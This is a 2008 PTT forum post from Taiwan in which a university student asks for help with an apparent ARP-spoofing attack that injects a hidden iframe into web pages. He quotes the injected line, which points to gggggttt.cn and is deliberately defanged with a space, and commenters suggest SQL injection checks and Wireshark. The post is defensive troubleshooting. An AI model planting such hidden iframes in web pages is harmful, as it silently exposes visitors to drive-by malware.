NetSecurity 板


LINE

※ [本文轉錄自 MUSTMIS 看板] 作者: yck0210 (我的心不再流浪) 看板: MUSTMIS 標題: [問題] 中毒?木馬?請大家幫忙找看看 時間: Wed Oct 22 19:59:40 2008 在我們系上網最近會發現學校許多Server都被掛上大陸網站隱藏語法.... 我先聲明,我不站在哪個單位,也不喜歡把技術問題給政治化! 我只是想找到問題,知道問題的根源,最重要的是讓大家有一個安全無虞的網路環境~ 所以,如果大家也發現跟我一樣有下列的問題,請回應給我! 告訴我您在哪上網的?您是瀏覽哪一個網頁才發現的? 最近學校有些網站會隱藏一些會導入病毒網站的語法.... 這個語法會導致看這網頁的同時也導入到這大陸網站! 至於下載什麼東西我們還不清楚,防毒軟體掃瞄本機也沒有病毒~ 但是有些網站會看不到內容,狀況畫面如下列二張圖片.... http://img80.imageshack.us/my.php?image=gggggttt1lf5.jpg
http://img89.imageshack.us/my.php?image=gggggttt2kf2.jpg
在這些疑似被入侵的網站內,打開網頁的原始碼的第一行會出現下列語法.... <iframe src=http ://gggggttt.cn/1/zz.htm width=100 height=0></iframe> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ => 網站故意加空格,怕有人誤連! 進這些網站沒什麼問題,但有的網頁就會打不開,用防毒軟體掃也掃不到! 今天我在網路上survey這個問題,發現台灣地區好像沒人反應,都是大陸在討論~ 我整理了一下,發現它的特性,好像是一種ARP攻擊,會造成整個區域網路都中獎! Norton 網站所公告關於 gggggttt.cn 的說明 http://safeweb.norton.com/report/show?name=gggggttt.cn 原本我的想法如下列所述.... 很多人都知道這個問題,都掃毒了也沒發現病毒,計中說網頁也沒被竄改! 在學校上網只要是連80 port會經過proxy server, 也就是一般http網頁都會經過代理伺服器~ 如果從校外連進學校就不會經過proxy server,也很正常,所以我懷疑是proxy中毒! 可是有趣的是,只有特定網站才會有這個現象,有的網站就不會有~ 網路上有討論說Client端跟Server端都沒問題,病毒是存在Server的記憶體裡, 所以Server重開機就不會有這問題! 但是問題還是沒解決,它有可能藏在SQL Server裡面,一被執行又發作了~ 計中說是我們資工系都中毒才會這樣,這句話讓我們系上的老師都很不爽! 我曾經想過會不會是路由器被攻擊,不過路由器只處理到網路的第三層, 所以應該是不太可能~ 系上太多電腦了,我光測我的實驗室就快吐了,有的電腦有這現象,有的沒有.... 所以,結論是,有看到這篇文章的朋友們幫我測一下,任何校內或校外的網頁都可以! 看看會不會有這問題,在原始碼內的第一行會不會有那一行語法? 如果有請告訴我,告訴我您在哪上網,看哪一個網頁? 謝謝大家的幫忙! --



※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 210.240.221.175
1F:推 ohya74921:antivirus 板問問吧 10/22 21:37
2F:→ yck0210:如果有高手知道是怎麼回事也請麻煩指教一下.... 10/22 21:57
--



※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 211.74.172.225
3F:推 allenown:與其「掃毒」,還不如用一些針對 Web Application 的工具 10/22 22:16
4F:→ allenown:測測看留言板還是什麼地方有 SQL Injection 之類的吧 10/22 22:17
5F:推 FireGenie:建議用 Wireshark 等軟體確認看看是否有奇怪的 ARP 封包 10/24 00:27
6F:→ yck0210:樓上的大大厲害!我用sniffer的確看到不正常的ARP 10/24 07:04
7F:推 allenown:static arp 趕快設定一下吧 XD 10/24 23:07
8F:→ yck0210:試過了,沒有用! 10/26 01:54







like.gif 您可能會有興趣的文章
icon.png[問題/行為] 貓晚上進房間會不會有憋尿問題
icon.pngRe: [閒聊] 選了錯誤的女孩成為魔法少女 XDDDDDDDDDD
icon.png[正妹] 瑞典 一張
icon.png[心得] EMS高領長版毛衣.墨小樓MC1002
icon.png[分享] 丹龍隔熱紙GE55+33+22
icon.png[問題] 清洗洗衣機
icon.png[尋物] 窗台下的空間
icon.png[閒聊] 双極の女神1 木魔爵
icon.png[售車] 新竹 1997 march 1297cc 白色 四門
icon.png[討論] 能從照片感受到攝影者心情嗎
icon.png[狂賀] 賀賀賀賀 賀!島村卯月!總選舉NO.1
icon.png[難過] 羨慕白皮膚的女生
icon.png閱讀文章
icon.png[黑特]
icon.png[問題] SBK S1安裝於安全帽位置
icon.png[分享] 舊woo100絕版開箱!!
icon.pngRe: [無言] 關於小包衛生紙
icon.png[開箱] E5-2683V3 RX480Strix 快睿C1 簡單測試
icon.png[心得] 蒼の海賊龍 地獄 執行者16PT
icon.png[售車] 1999年Virage iO 1.8EXi
icon.png[心得] 挑戰33 LV10 獅子座pt solo
icon.png[閒聊] 手把手教你不被桶之新手主購教學
icon.png[分享] Civic Type R 量產版官方照無預警流出
icon.png[售車] Golf 4 2.0 銀色 自排
icon.png[出售] Graco提籃汽座(有底座)2000元誠可議
icon.png[問題] 請問補牙材質掉了還能再補嗎?(台中半年內
icon.png[問題] 44th 單曲 生寫竟然都給重複的啊啊!
icon.png[心得] 華南紅卡/icash 核卡
icon.png[問題] 拔牙矯正這樣正常嗎
icon.png[贈送] 老莫高業 初業 102年版
icon.png[情報] 三大行動支付 本季掀戰火
icon.png[寶寶] 博客來Amos水蠟筆5/1特價五折
icon.pngRe: [心得] 新鮮人一些面試分享
icon.png[心得] 蒼の海賊龍 地獄 麒麟25PT
icon.pngRe: [閒聊] (君の名は。雷慎入) 君名二創漫畫翻譯
icon.pngRe: [閒聊] OGN中場影片:失蹤人口局 (英文字幕)
icon.png[問題] 台灣大哥大4G訊號差
icon.png[出售] [全國]全新千尋侘草LED燈, 水草

請輸入看板名稱,例如:iOS站內搜尋

TOP